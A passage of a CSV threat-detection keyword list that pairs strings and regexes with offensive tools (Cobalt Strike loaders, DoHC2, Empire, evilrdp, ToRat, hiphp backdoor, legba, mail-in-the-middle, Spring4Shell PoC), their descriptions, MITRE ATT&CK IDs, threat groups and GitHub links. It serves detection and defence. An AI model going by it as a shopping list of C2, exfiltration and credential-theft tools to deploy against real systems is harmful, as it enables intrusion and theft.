- T1566 - T1568 - T1569","TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/elceef/dnstwist","1","0","N/A","3","10","4552","734","2024-04-03T20:19:09Z","2015-06-11T12:24:17Z" "*dnsx -silent -d * -w dns_worldlist.txt*",".{0,1000}dnsx\s\-silent\s\-d\s.{0,1000}\s\-w\sdns_worldlist\.txt.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*dnsx -silent -d domains.txt -w jira*grafana*jenkins*",".{0,1000}dnsx\s\-silent\s\-d\sdomains\.txt\s\-w\sjira.{0,1000}grafana.{0,1000}jenkins.{0,1000}","offensive_tool_keyword","exegol","Fully featured and community-driven hacking environment with hundreds of offensive tools","T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?","TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?","N/A","N/A","Exploitation tools","https://github.com/ThePorgs/Exegol","1","0","N/A","10","10","1560","167","2024-05-01T11:56:30Z","2020-03-09T19:12:11Z" "*Do you want Ghauri set it for you ? [Y/n]*",".{0,1000}Do\syou\swant\sGhauri\sset\sit\sfor\syou\s\?\s\[Y\/n\].{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*Do you want to launch the payload from x86 Powershell?*",".{0,1000}Do\syou\swant\sto\slaunch\sthe\spayload\sfrom\sx86\sPowershell\?.{0,1000}","offensive_tool_keyword","Python-Rootkit","full undetectable python RAT which can bypass almost all antivirus and open a backdoor inside any windows machine which will establish a reverse https Metasploit connection to your listening machine","T1100 - T1027 - T1219 - T1560.001 - T1021.005","TA0005 - TA0003 - TA0011","N/A","N/A","C2","https://github.com/0xIslamTaha/Python-Rootkit","1","0","N/A","10","10","550","143","2023-12-03T10:38:39Z","2016-06-09T10:49:54Z" "*Do you want to skip test payloads specific for other DBMSes?*",".{0,1000}Do\syou\swant\sto\sskip\stest\spayloads\sspecific\sfor\sother\sDBMSes\?.{0,1000}","offensive_tool_keyword","ghauri","A cross-platform python based advanced sql injections detection & exploitation tool","T1190 - T1210 - T1095","TA0001 - TA0002 - TA0009","N/A","N/A","Web Attacks","https://github.com/r0oth3x49/ghauri","1","0","#contentstrings","8","10","2374","235","2024-04-25T12:17:16Z","2022-10-01T11:21:50Z" "*do_attack(*",".{0,1000}do_attack\(.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File (BOF) to obtain a usable TGT for the current user and does not require elevated privileges on the host","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/connormcgarr/tgtdelegation","1","0","N/A","10","10","140","21","2021-11-26T16:45:05Z","2021-11-22T18:42:57Z" "*do_bypassuac*",".{0,1000}do_bypassuac.{0,1000}","offensive_tool_keyword","DNS-Persist","DNS-Persist is a post-exploitation agent which uses DNS for command and control.","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/0x09AL/DNS-Persist","1","0","N/A","10","10","211","65","2017-11-20T08:53:25Z","2017-11-10T15:23:49Z" "*do_metasploit(*",".{0,1000}do_metasploit\(.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*do_pyinject*",".{0,1000}do_pyinject.{0,1000}","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","454","111","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "*do_socksoverrdp(*127.0.0.1*",".{0,1000}do_socksoverrdp\(.{0,1000}127\.0\.0\.1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*do_socksproxy(* listen_ip = '127.0.0.1'*",".{0,1000}do_socksproxy\(.{0,1000}\slisten_ip\s\=\s\'127\.0\.0\.1\'.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*do_startpscmd(*serverscript.ps1*",".{0,1000}do_startpscmd\(.{0,1000}serverscript\.ps1.{0,1000}","offensive_tool_keyword","evilrdp","Th evil twin of aardwolfgui using the aardwolf RDP client library that gives you extended control over the target and additional scripting capabilities from the command line.","T1021.001 - T1056.001 - T1113 - T1078.002 - T1105 - T1090.002 - T1059.001","TA0008 - TA0002 - TA0005 - TA0001 - TA0009 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/skelsec/evilrdp","1","0","N/A","10","10","267","30","2023-12-09T17:10:52Z","2023-11-29T13:44:58Z" "*Do-AltShiftEsc*",".{0,1000}Do\-AltShiftEsc.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*Do-AltShiftTab*",".{0,1000}Do\-AltShiftTab.{0,1000}","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","Invoke-MS16135.ps1","N/A","10","7291","2777","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*doc/extras/HACKING.*",".{0,1000}doc\/extras\/HACKING\..{0,1000}","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","9291","1993","2024-04-30T12:58:37Z","2011-12-16T19:43:47Z" "*docker * covenant*",".{0,1000}docker\s.{0,1000}\scovenant.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*docker * --name elite *",".{0,1000}docker\s.{0,1000}\s\-\-name\selite\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*docker * -t elite *",".{0,1000}docker\s.{0,1000}\s\-t\selite\s.{0,1000}","offensive_tool_keyword","covenant","Covenant is a collaborative .NET C2 framework for red teamers","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1570-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/cobbr/Covenant","1","0","N/A","10","10","4000","744","2023-02-21T23:55:48Z","2019-02-07T15:55:18Z" "*docker build . -t torat*",".{0,1000}docker\sbuild\s\.\s\-t\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*docker build -t hiphp:latest*",".{0,1000}docker\sbuild\s\-t\shiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*docker build -t legba .*",".{0,1000}docker\sbuild\s\-t\slegba\s\..{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*docker build -t maitm *",".{0,1000}docker\sbuild\s\-t\smaitm\s.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*docker build -t merlin-agent:*-linux*",".{0,1000}docker\sbuild\s\-t\smerlin\-agent\:.{0,1000}\-linux.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","0","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*docker build -t rmg .*",".{0,1000}docker\sbuild\s\-t\srmg\s\..{0,1000}","offensive_tool_keyword","remote-method-guesser","remote-method-guesser?(rmg) is a?Java RMI?vulnerability scanner and can be used to identify and verify common security vulnerabilities on?Java RMI?endpoints.","T1210.002 - T1046 - T1078.003","TA0001 - TA0007 - TA0040","N/A","N/A","Vulnerability Scanner","https://github.com/qtc-de/remote-method-guesser","1","0","N/A","6","8","773","101","2024-04-20T20:46:48Z","2019-11-04T11:37:38Z" "*docker run */pacu:latest*",".{0,1000}docker\srun\s.{0,1000}\/pacu\:latest.{0,1000}","offensive_tool_keyword","pacu","The AWS exploitation framework designed for testing the security of Amazon Web Services environments.","T1136.003 - T1190 - T1078.004","TA0006 - TA0001","N/A","N/A","Frameworks","https://github.com/RhinoSecurityLabs/pacu","1","0","N/A","9","10","4032","652","2024-04-05T08:39:49Z","2018-06-13T21:58:59Z" "*docker run */usr/src/rde1*",".{0,1000}docker\srun\s.{0,1000}\/usr\/src\/rde1.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*docker run */usr/src/rec2*",".{0,1000}docker\srun\s.{0,1000}\/usr\/src\/rec2.{0,1000}","offensive_tool_keyword","RDE1","RDE1 (Rusty Data Exfiltrator) is client and server tool allowing auditor to extract files from DNS and HTTPS protocols written in Rust","T1048.003 - T1567.001 - T1020","TA0011 - TA0010 - TA0040","N/A","N/A","C2","https://github.com/g0h4n/RDE1","1","0","N/A","10","10","35","5","2023-10-02T17:47:11Z","2023-09-25T20:29:08Z" "*docker run -it --rm local/pspy*",".{0,1000}docker\srun\s\-it\s\-\-rm\slocal\/pspy.{0,1000}","offensive_tool_keyword","pspy","Monitor linux processes without root permissions","T1057 - T1082 - T1518.001","TA0007","N/A","N/A","Discovery","https://github.com/DominicBreuker/pspy","1","0","N/A","8","10","4548","484","2023-01-17T21:09:22Z","2018-02-08T21:41:37Z" "*docker run -it torat*",".{0,1000}docker\srun\s\-it\storat.{0,1000}","offensive_tool_keyword","ToRat","ToRat is a Remote Administation tool written in Go using Tor as a transport mechanism and RPC for communication","T1219 - T1021 - T1105","TA0008 - TA0011 - TA0005","N/A","N/A","C2","https://github.com/lu4p/ToRat","1","0","N/A","10","10","949","198","2023-03-13T08:56:55Z","2019-01-19T11:44:01Z" "*docker run legba*",".{0,1000}docker\srun\slegba.{0,1000}","offensive_tool_keyword","legba","A multiprotocol credentials bruteforcer / password sprayer and enumerator","T1110 - T1110.003 - T1110.001","TA0006 - TA0007","N/A","N/A","Credential Access","https://github.com/evilsocket/legba","1","0","N/A","10","10","1248","64","2024-03-12T12:39:48Z","2023-10-23T15:44:06Z" "*docker run -p * spring4shell",".{0,1000}docker\srun\s\-p\s.{0,1000}\sspring4shell","offensive_tool_keyword","Spring4Shell","Dockerized Spring4Shell (CVE-2022-22965) PoC application and exploit","T1550 - T1555 - T1212 - T1558","TA0001 - TA0004 - TA0006","N/A","N/A","Exploitation tools","https://github.com/reznok/Spring4Shell-POC","1","0","N/A","N/A","4","307","234","2022-08-04T18:26:18Z","2022-03-31T00:24:28Z" "*docker run --rm -ti maitm -*",".{0,1000}docker\srun\s\-\-rm\s\-ti\smaitm\s\-.{0,1000}","offensive_tool_keyword","mail-in-the-middle","This script sits in the middle between a legitimate sender of an email and the legitimate recipient of that email. This means that we (the attackers) are receiving sensitive information not originally destined to us","T1557 - T1598.002 - T1566.002 - T1192 - T1204.002 - T1539 - T1593","TA0001 - TA0006 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/sensepost/mail-in-the-middle","1","0","N/A","8","1","78","9","2024-04-01T15:28:44Z","2024-02-21T07:25:37Z" "*docker run sitadel*",".{0,1000}docker\srun\ssitadel.{0,1000}","offensive_tool_keyword","Sitadel","Web Application Security Scanner","T1592.002 - T1210.001 - T1190.001 - T1046 - T1213 - T1071.001","TA0001 - TA0007 - TA0043 - TA0002 - TA0003","N/A","N/A","Network Exploitation tools","https://github.com/shenril/Sitadel","1","0","N/A","N/A","6","535","111","2023-11-29T01:33:28Z","2018-01-17T09:06:24Z" "*docker* donut *",".{0,1000}docker.{0,1000}\sdonut\s.{0,1000}","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","3229","590","2024-03-31T02:30:39Z","2019-03-27T23:24:44Z" "*docker*/hiphp:latest*",".{0,1000}docker.{0,1000}\/hiphp\:latest.{0,1000}","offensive_tool_keyword","hiphp","The BackDoor of HIPHP gives you the power to control websites based on PHP using HTTP/HTTPS protocol. By sending files - tokens and commands through port 80s POST/GET method - users can access a range of activities such as downloading and editing files. It also allows for connecting to Tor networks with password protection for extra security.","T1105 - T1071.001 - T1132 - T1505 - T1608 - T1560 ","TA0011 - TA0001 - TA0002 - TA0009","N/A","N/A","C2","https://github.com/yasserbdj96/hiphp","1","0","N/A","10","10","194","39","2024-04-18T11:55:55Z","2021-04-05T20:29:57Z" "*docker/gsocket*",".{0,1000}docker\/gsocket.{0,1000}","offensive_tool_keyword","gsocket","The Global Socket Tookit allows two users behind NAT/Firewall to establish a TCP connection with each other. Mostly abused by attackers ","T1021 - T1090 - T1573 - T1219 - T1562.001","TA0001 - TA0005 - TA0008 - TA0011","N/A","N/A","C2","https://github.com/hackerschoice/gsocket","1","1","N/A","9","10","1335","120","2024-04-22T15:20:00Z","2020-09-18T16:14:22Z" "*docker-compose logs wiresocks*",".{0,1000}docker\-compose\slogs\swiresocks.{0,1000}","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","0","N/A","9","3","264","28","2024-01-19T10:58:20Z","2022-03-23T12:27:07Z" "*DockerPwn*",".{0,1000}DockerPwn.{0,1000}","offensive_tool_keyword","DockerPwn","Automation for abusing an exposed Docker TCP Socket. ","T1068 - T1528 - T1550","TA0002 - TA0003 - TA0008","N/A","N/A","Exploitation tools","https://github.com/AbsoZed/DockerPwn.py","1","0","N/A","N/A","3","211","30","2022-12-08T03:17:35Z","2019-11-23T22:32:49Z" "*DocPlz-main.zip*",".{0,1000}DocPlz\-main\.zip.{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","1","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*docs.mythic-c2.net*",".{0,1000}docs\.mythic\-c2\.net.{0,1000}","offensive_tool_keyword","merlin-agent","Merlin is a post-exploit Command & Control (C2) tool also known as a Remote Access Tool (RAT)","T1219 - T1105 - T1071 - T1090 - T1055 - T1047","TA0005 - TA0002 - TA0003 - TA0006 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Ne0nd0g/merlin-agent","1","1","N/A","10","10","176","58","2024-04-23T04:48:21Z","2020-07-17T20:47:56Z" "*DocsPLZ\DocsPLZ.*",".{0,1000}DocsPLZ\\DocsPLZ\..{0,1000}","offensive_tool_keyword","DocPlz","Documents Exfiltration and C2 project","T1105 - T1567 - T1071","TA0011 - TA0010 - TA0009","N/A","N/A","Data Exfiltration","https://github.com/TheD1rkMtr/DocPlz","1","0","N/A","10","2","144","32","2023-10-10T19:01:42Z","2023-10-02T20:49:22Z" "*docstring for bruteforce.*",".{0,1000}docstring\sfor\sbruteforce\..{0,1000}","offensive_tool_keyword","smartbrute","Password spraying and bruteforcing tool for Active Directory Domain Services","T1110.001 - T1110.003","TA0001 - TA0006","N/A","N/A","Credential Access","https://github.com/ShutdownRepo/smartbrute","1","0","N/A","10","4","312","54","2024-03-04T19:23:03Z","2021-07-16T14:53:29Z" "*DoEvil()*",".{0,1000}DoEvil\(\).{0,1000}","offensive_tool_keyword","ETWEventSubscription","Similar to WMI event subscriptions but leverages Event Tracing for Windows. When the event on the system occurs currently either when any user logs in or a specified process is started - the DoEvil() method is executed.","T1053.005 - T1546.003 - T1055.001","TA0004 - TA0005","N/A","N/A","Exploitation tools","https://github.com/matterpreter/OffensiveCSharp/tree/master/ETWEventSubscription","1","0","N/A","10","10","1309","237","2023-02-06T14:56:26Z","2019-02-06T00:32:29Z" "*Do-Exfiltration.ps1*",".{0,1000}Do\-Exfiltration\.ps1.{0,1000}","offensive_tool_keyword","nishang","Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security penetration testing and red teaming. Nishang is useful during all phases of penetration testing.","T1550 T1555 T1212 T1558","N/A","N/A","N/A","Exploitation tools","https://github.com/samratashok/nishang","1","1","N/A","N/A","10","8342","2385","2024-04-25T19:39:44Z","2014-05-19T11:48:24Z" "*Doge-Loader*xor.go*",".{0,1000}Doge\-Loader.{0,1000}xor\.go.{0,1000}","offensive_tool_keyword","cobaltstrike","Cobalt Strike Shellcode Loader by Golang","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/timwhitez/Doge-Loader","1","1","N/A","10","10","279","59","2021-04-22T08:24:59Z","2020-10-09T04:47:54Z" "*DoHC2*BeaconConnector*",".{0,1000}DoHC2.{0,1000}BeaconConnector.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2.exe*",".{0,1000}DoHC2\.exe.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2.py*",".{0,1000}DoHC2\.py.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2Runner.*",".{0,1000}DoHC2Runner\..{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2Runner.exe*",".{0,1000}DoHC2Runner\.exe.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHC2Runner.pdb*",".{0,1000}DoHC2Runner\.pdb.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","1","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*DoHChannel.cs*",".{0,1000}DoHChannel\.cs.{0,1000}","offensive_tool_keyword","DoHC2","DoHC2 allows the ExternalC2 library from Ryan Hanson (https://github.com/ryhanson/ExternalC2) to be leveraged for command and control (C2) via DNS over HTTPS (DoH). This is built for the popular Adversary Simulation and Red Team Operations Software Cobalt Strike","T1090.004 - T1021.002 - T1071.001","TA0011 - TA0008","N/A","N/A","C2","https://github.com/SpiderLabs/DoHC2","1","0","N/A","10","10","440","100","2020-08-07T12:48:13Z","2018-10-23T19:40:23Z" "*-Domain * -AllowDelegation 